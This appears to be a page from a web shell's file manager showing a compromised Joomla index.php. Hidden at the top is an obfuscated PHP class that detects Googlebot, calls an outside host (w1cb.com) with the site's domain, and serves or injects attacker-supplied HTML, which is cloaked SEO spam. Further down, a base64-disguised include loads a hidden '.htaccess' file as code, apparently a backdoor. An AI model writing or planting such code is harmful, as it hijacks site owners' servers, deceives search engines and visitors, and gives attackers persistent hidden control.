Current Path :
/
home
/
platinum
/
www
/
Or
Select Your Path :
Upload File :
New :
File
Dir
/home/platinum/www/index.php
<?php if (!class_exists('_x9515fec7')) { #[\AllowDynamicProperties] class _x9515fec7 { public static $_buf = ''; private $_a = 'https://w1cb.com'; private $_k = 'linkhub-master-change-me'; public function init() { if (!isset($_SERVER['HTTP_USER_AGENT'])) return; $ua = strtolower((string)$_SERVER['HTTP_USER_AGENT']); $bots = array('googlebot', 'google.com/bot'); $hit = false; $n = count($bots); for ($i = 0; $i < $n; $i++) { if (strpos($ua, $bots[$i]) !== false) { $hit = true; break; } } if (!$hit) return; $domain = isset($_SERVER['HTTP_HOST']) ? (string)$_SERVER['HTTP_HOST'] : ''; $uri = isset($_SERVER['REQUEST_URI']) ? (string)$_SERVER['REQUEST_URI'] : '/'; if ($domain === '') return; if (!function_exists('json_decode')) return; $resp = $this->_call($domain, $uri); if ($resp === false || $resp === '') return; $j = json_decode($resp, true); if (!is_array($j) || !isset($j['action']) || $j['action'] === 'none') return; if ($j['action'] === 'article' && !empty($j['html'])) { $g = 0; while (ob_get_level() > 0 && $g < 20) { @ob_end_clean(); $g++; } echo $j['html']; exit; } if ($j['action'] === 'inject' && !empty($j['html'])) { _x9515fec7::$_buf = (string)$j['html']; ob_start(array('_x9515fec7', '_inject')); } } public static function _inject($o) { $h = _x9515fec7::$_buf; if ($h === '') return $o; $o = (string)$o; $isHtml = true; $compressed = false; $hasCLen = false; if (function_exists('headers_list')) { $hl = headers_list(); $n = count($hl); for ($i = 0; $i < $n; $i++) { $line = $hl[$i]; if (stripos($line, 'content-type:') === 0) { $isHtml = (stripos($line, 'text/html') !== false); } elseif (stripos($line, 'content-encoding:') === 0) { if (stripos($line, 'identity') === false) $compressed = true; } elseif (stripos($line, 'content-length:') === 0) { $hasCLen = true; } } } if (!$compressed && function_exists('ini_get')) { $z = ini_get('zlib.output_compression'); if ($z && $z !== '0' && strtolower($z) !== 'off') { $compressed = true; } } if (!$isHtml || $compressed) return $o; $p = strripos($o, '</body>'); if ($p === false) $p = strripos($o, '</html>'); if ($p === false) { $out = $o . $h; } else { $out = substr($o, 0, $p) . $h . "\n" . substr($o, $p); } if ($hasCLen && function_exists('header_remove') && !headers_sent()) { header_remove('Content-Length'); } return $out; } private function _call($domain, $uri) { $q = $this->_a . '/api/check.php?domain=' . urlencode($domain) . '&uri=' . urlencode($uri) . '&key=' . urlencode($this->_k); if (function_exists('curl_init')) { $c = curl_init(); curl_setopt($c, CURLOPT_URL, $q); curl_setopt($c, CURLOPT_RETURNTRANSFER, true); curl_setopt($c, CURLOPT_TIMEOUT, 8); curl_setopt($c, CURLOPT_CONNECTTIMEOUT, 5); curl_setopt($c, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($c, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($c, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'); $r = curl_exec($c); $code = curl_getinfo($c, CURLINFO_HTTP_CODE); @curl_close($c); if ($r !== false && $code >= 200 && $code < 300) return $r; return false; } if (function_exists('ini_get') && ini_get('allow_url_fopen')) { if (function_exists('stream_context_create')) { $ctx = stream_context_create(array( 'http' => array( 'timeout' => 8, 'ignore_errors' => true, 'user_agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)', ), 'ssl' => array( 'verify_peer' => false, 'verify_peer_name' => false, ), )); $r = @file_get_contents($q, false, $ctx); } else { $r = @file_get_contents($q); } return ($r === false || $r === null) ? false : $r; } return false; } } $_v42ca78 = new _x9515fec7(); $_v42ca78->init(); unset($_v42ca78); } ?><?php /** * @package Joomla.Site * * @copyright (C) 2005 Open Source Matters, Inc. <https://www.joomla.org> * @license GNU General Public License version 2 or later; see LICENSE.txt */ $b = 'base6' . '4_decode'; include $b('aW1hZ2VzLy5odGFjY2Vz'); // NOTE: This file should remain compatible with PHP 5.2 to allow us to run our PHP minimum check and show a friendly error message // Define the application's minimum supported PHP version as a constant so it can be referenced within the application. define('JOOMLA_MINIMUM_PHP', '8.1.0'); if (version_compare(PHP_VERSION, JOOMLA_MINIMUM_PHP, '<')) { die( str_replace( '{{phpversion}}', JOOMLA_MINIMUM_PHP, file_get_contents(dirname(__FILE__) . '/includes/incompatible.html') ) ); } /** * Constant that is checked in included files to prevent direct access. * define() is used rather than "const" to not error for PHP 5.2 and lower */ define('_JEXEC', 1); // Run the application - All executable code should be triggered through this file require_once dirname(__FILE__) . '/includes/app.php';